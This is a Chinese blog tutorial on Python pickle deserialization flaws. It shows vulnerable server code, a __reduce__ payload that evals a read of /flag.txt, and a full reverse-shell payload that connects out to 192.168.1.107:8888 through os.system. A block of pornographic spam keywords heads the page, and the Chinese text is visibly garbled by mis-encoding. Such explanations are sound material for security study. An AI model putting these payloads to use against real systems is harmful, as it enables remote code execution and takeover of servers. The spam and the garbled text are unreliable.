黄色网页视频 I 影音先锋日日狠狠久久 I 秋霞午夜毛片 I 秋霞一二三区 I 国产成人片无码视频 I 国产 精品 自在自线 I av免费观看网站 I 日本精品久久久久中文字幕5 I 91看视频 I 看全色黄大色黄女片18 I 精品不卡一区 I 亚洲最新精品 I 欧美 激情 在线 I 人妻少妇精品久久 I 国产99视频精品免费专区 I 欧美影院 I 欧美精品在欧美一区二区少妇 I av大片网站 I 国产精品黄色片 I 888久久 I 狠狠干最新 I 看看黄色一级片 I 黄色精品久久 I 三级av在线 I 69色综合 I 国产日韩欧美91 I 亚洲精品偷拍 I 激情小说亚洲图片 I 久久国产视频精品 I 国产综合精品一区二区三区 I 色婷婷国产 I 最新成人av在线 I 国产私拍精品 I 日韩成人影音 I 日日夜夜天天综合

python反序列化漏洞

系統(tǒng) 1951 0

原理
在網(wǎng)頁(yè)源碼中如果出現(xiàn)將用戶輸入數(shù)據(jù)進(jìn)行反序列化當(dāng)成參數(shù)輸出時(shí),出現(xiàn)漏洞,可造成任
意命令執(zhí)行
例如網(wǎng)頁(yè)源碼
try:
?????? become = self.get_argument('become')
?????? p = pickle.loads(urllib.unquote(become))
?????? return self.render('form.html', res=p, member=1)
except:
??????? return self.render('form.html', res='This is Black Technology!', member=0)
過(guò)程:用戶傳入become參數(shù),服務(wù)器將become參數(shù)url解碼再反序列化并將結(jié)果給p,將p當(dāng)
作一個(gè)參數(shù)給res,并且form.html有向客戶端顯示res的部分

那么攻擊方式就是修改可控的become參數(shù),當(dāng)序列化以及反序列化的過(guò)程中中碰到一無(wú)所知的擴(kuò)展類型( python2,這里指的就是新式類)的時(shí)候,可以通過(guò)類中定義的 __reduce__ 方法來(lái)告知如何進(jìn)行序列化或者反序列化。
也就是說(shuō)我們,只要在新式類中定義一個(gè)__reduce__ 方法,我們就能在序列化的使用讓這個(gè)類根據(jù)我們?cè)?__reduce__ 中指定的方式進(jìn)行序列化。

Demo:
①首先用python得到攻擊所需的payload
class payload(object):
?? ?def __reduce__(self):
?? ??? ?return (eval,("open('/flag.txt','r').read()",))? //表示用eval的方式序列化后面內(nèi)容
a=pickle.dumps(payload())? //得到指定方法序列化后的pickle數(shù)據(jù)
print(urllib.quote(a))???? //得到url編碼后的payload

②接下來(lái)服務(wù)端收到payload后
p = pickle.loads(urllib.unquote(a)) //先url解碼再用指定方法反序列化內(nèi)容,結(jié)果執(zhí)行了代碼
return self.render('form.html', res=p, member=1)? //這時(shí)p已經(jīng)是執(zhí)行代碼后的內(nèi)容了

拓展:
既然能夠任意執(zhí)行代碼,那么就可以反彈shell,以下為payload代碼
import pickle
import urllib
import os

class exp(object):
? ?def __reduce__(self):
? ? ? ?s="""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.107",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' """
? ? ? ?return os.system, (s,)? //指明用os.system方法序列化s字符串內(nèi)容
?
poc = pickle.dumps(exp()) //按照指定方式序列化字符串
print(urllib.quote(poc))

詳細(xì)的看下字符串內(nèi)容
python -c '執(zhí)行命令'
執(zhí)行命令
Import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.1.107",8888));
os.dup2(s.fileno(),0);???? //表示所有的輸入內(nèi)容都傳送給socket
os.dup2(s.fileno(),1);??? //表示所有的輸出內(nèi)容都傳送給socket
os.dup2(s.fileno(),2);?? //表示所有的錯(cuò)誤輸出都傳送給socket
p=subprocess.call(["/bin/sh","-i"]);?? //使用sh -i 使shell可交互


更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號(hào)聯(lián)系: 360901061

您的支持是博主寫(xiě)作最大的動(dòng)力,如果您喜歡我的文章,感覺(jué)我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對(duì)您有幫助就好】

您的支持是博主寫(xiě)作最大的動(dòng)力,如果您喜歡我的文章,感覺(jué)我的文章對(duì)您有幫助,請(qǐng)用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長(zhǎng)會(huì)非常 感謝您的哦!!!

發(fā)表我的評(píng)論
最新評(píng)論 總共0條評(píng)論